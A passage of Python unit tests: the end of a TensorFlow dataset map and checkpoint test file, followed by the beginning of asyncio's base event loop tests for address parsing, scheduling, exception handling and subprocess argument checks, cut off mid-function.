dataset = dataset_ops.Dataset.from_tensors((42, None))
def map_function(x, y):
if y is None:
return x / 2
return x
dataset = apply_map(dataset, map_function)
self.assertDatasetProduces(dataset, expected_output=[21])
@combinations.generate(test_base.eager_only_combinations())
def testCheckpointLargeBuffer(self):
if pywrap_sanitizers.is_tsan_enabled():
self.skipTest("Creating a large buffer causes OOM when using tsan.")
# Tensor of size 512M
dataset = dataset_ops.Dataset.from_tensors(
array_ops.ones((128, 1024, 1024), dtype=dtypes.float32))
dataset = dataset.repeat()
# Set parallelism to 5 to exceed the 2GB protobuf limit
dataset = dataset.map(lambda x: x * 2, num_parallel_calls=5)
iterator = iter(dataset)
next(iterator) # request an element to fill the parallel map buffer
ckpt = trackable_utils.Checkpoint(iterator=iterator)
manager = checkpoint_management.CheckpointManager(
ckpt, self.get_temp_dir(), max_to_keep=1)
manager.save()
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 1])))
def testName(self, num_parallel_calls):
dataset = dataset_ops.Dataset.from_tensors(21).map(
lambda x: x * 2, num_parallel_calls=num_parallel_calls, name="map")
self.assertDatasetProduces(dataset, [42])
class MapCheckpointTest(checkpoint_test_base.CheckpointTestBase,
parameterized.TestCase):
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testCore(self, verify_fn, num_parallel_calls):
tensor_slice_len = 7
num_epochs = 2
multiplier = 37.0
def _build_ds():
components = (np.arange(tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=num_parallel_calls).repeat(num_epochs))
verify_fn(self, _build_ds, tensor_slice_len * num_epochs)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testSaveStatefulFunction(self, num_parallel_calls):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.cast(x, dtypes.int32)
return dataset_ops.Dataset.range(100).map(
_map_fn, num_parallel_calls=num_parallel_calls)
self.verify_error_on_save(_build_ds, 15, errors.FailedPreconditionError)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testCaptureVariableInMapFn(self, num_parallel_calls):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1),
num_parallel_calls=num_parallel_calls))
self.verify_error_on_save(_build_ds, 15, errors.FailedPreconditionError)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testCaptureConstantInMapFn(self, verify_fn, num_parallel_calls):
num_outputs = 10
def _build_ds():
constant_var = constant_op.constant(5)
return (dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda x: x + constant_var, num_parallel_calls=num_parallel_calls))
verify_fn(self, _build_ds, num_outputs)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testCaptureDefunInMapFn(self, verify_fn, num_parallel_calls):
num_outputs = 10
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.cast(x, dtypes.int32)
return dataset_ops.Dataset.range(num_outputs).map(
defun_fn, num_parallel_calls=num_parallel_calls)
verify_fn(self, _build_ds, num_outputs)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testBuildDefunInMapFn(self, verify_fn, num_parallel_calls):
num_outputs = 10
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.cast(x, dtypes.int32)
return constant_op.constant(11000) + defun_fn_deep(
math_ops.cast(x, dtypes.int32))
return dataset_ops.Dataset.range(num_outputs).map(
defun_fn, num_parallel_calls=num_parallel_calls)
verify_fn(self, _build_ds, num_outputs)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 2])))
def testSparse(self, verify_fn, num_parallel_calls):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _build_ds(num_outputs):
return dataset_ops.Dataset.range(num_outputs).map(
_sparse, num_parallel_calls=num_parallel_calls)
num_outputs = 10
verify_fn(self, lambda: _build_ds(num_outputs), num_outputs=num_outputs)
if __name__ == "__main__":
test.main()
|
test_base_events.py | """Tests for base_events.py"""
import errno
import logging
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
try:
from test.support.script_helper import assert_python_ok
except ImportError:
try:
from test.script_helper import assert_python_ok
except ImportError:
from asyncio.test_support import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_getnameinfo(self):
sockaddr = mock.Mock()
self.loop.run_in_executor = mock.Mock()
self.loop.getnameinfo(sockaddr)
self.assertEqual(
(None, socket.getnameinfo, sockaddr, 0),
self.loop.run_in_executor.call_args[0])
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test_run_once_in_executor_plain(self):
def cb():
pass
f = asyncio.Future(loop=self.loop)
executor = mock.Mock()
executor.submit.return_value = f
self.loop.set_default_executor(executor)
res = self.loop.run_in_executor(None, cb)
self.assertIs(f, res)
executor = mock.Mock()
executor.submit.return_value = f
res = self.loop.run_in_executor(executor, cb)
self.assertIs(f, res)
self.assertTrue(executor.submit.called)
f.cancel() # Don't complain about abandoned Future.
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
return []
# logging needs debug flag
self.loop.set_debug(True)
# Log to INFO level if timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
return []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
yield from asyncio.sleep(0.01, loop=self.loop)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
